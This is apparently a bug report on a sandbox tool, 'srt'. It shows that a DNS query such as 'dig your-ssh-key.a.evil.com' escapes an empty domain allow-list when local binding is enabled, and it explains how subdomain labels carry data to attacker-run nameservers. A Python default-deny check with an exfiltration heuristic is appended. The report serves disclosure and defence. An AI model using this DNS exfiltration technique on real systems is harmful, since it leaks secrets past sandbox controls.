settings.json

```json
{
  "network": {
    "allowedDomains": [],
    "deniedDomains": [],
    "allowLocalBinding": true
  },
  "filesystem": {
    "denyRead": [],
    "allowWrite": [],
    "denyWrite": []
  }
}
```

command

```
srt --settings settings.json 'dig your-ssh-key.a.evil.com'
```

EXPECTED

evil.com is not on the allowed domains list, so this DNS query is blocked. Allowing local port binding doesn't allow outbound network requests from inside the sandbox.

ACTUAL

Data exfiltration: the owners of evil.com can set an NS record for a.evil.com, which causes Google/Cloudflare/all other resolvers to send the A query for your-ssh-key.a.evil.com to evil.com-owned DNS servers. Any sandbox with local port binding enabled is liable for data exfiltration.

```
; <<>> DiG 9.10.6 <<>> your-ssh-key.a.evil.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25585
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;your-ssh-key.a.evil.com.	IN	A

;; ANSWER SECTION:
your-ssh-key.a.evil.com.	3600	IN	A	66.96.146.129

;; Query time: 48 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Mon Jan 12 17:29:41 EST 2026
;; MSG SIZE  rcvd: 68
```
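A default-deny check of the kind the sandbox should apply to every outbound DNS name before it reaches a resolver, plus a heuristic that flags labels carrying encoded data, as an added example that is not part of this report or of srt. The settings dict mirrors the report's settings.json; the label-length and entropy thresholds are assumed values.

```python
import math
from collections import Counter

# Constructed copy of the report's settings: an empty allow-list, so every
# outbound DNS name should be refused, whatever allowLocalBinding says.
REPORT_SETTINGS = {
    "network": {"allowedDomains": [], "deniedDomains": [], "allowLocalBinding": True},
}

def _matches(qname: str, domains: list) -> bool:
    """True if qname equals, or is a subdomain of, any entry in domains."""
    q = qname.rstrip(".").lower()
    for d in domains:
        d = d.rstrip(".").lower()
        if q == d or q.endswith("." + d):
            return True
    return False

def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for the empty string."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def looks_like_exfil(qname: str, max_label_len: int = 30, min_entropy: float = 3.5) -> bool:
    """Heuristic (assumed thresholds): long or high-entropy labels left of the
    registrable name are how data rides inside a query, as in your-ssh-key.a.evil.com."""
    labels = [l for l in qname.rstrip(".").lower().split(".") if l]
    for label in labels[:-2]:  # skip the registrable part, e.g. evil.com
        if len(label) > max_label_len or shannon_entropy(label) >= min_entropy:
            return True
    return False

def evaluate_query(qname: str, settings: dict) -> dict:
    """Decision to take before the resolver ever sees the query. Default-deny:
    a name is released only if it sits under an allowedDomains entry and under
    no deniedDomains entry. Released names are still flagged when they look like
    an encoded payload, so an allow-listed domain cannot quietly carry data out."""
    net = settings["network"]
    flag = looks_like_exfil(qname)
    if _matches(qname, net["deniedDomains"]):
        return {"allow": False, "reason": "deniedDomains", "suspicious": flag}
    if not _matches(qname, net["allowedDomains"]):
        return {"allow": False, "reason": "not in allowedDomains", "suspicious": flag}
    return {"allow": True, "reason": "allowedDomains", "suspicious": flag}

if __name__ == "__main__":
    # The report's query against the report's settings: must be refused.
    print(evaluate_query("your-ssh-key.a.evil.com", REPORT_SETTINGS))
```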
First seen: 2026-01-13 11:04
Last seen: 2026-01-13 11:04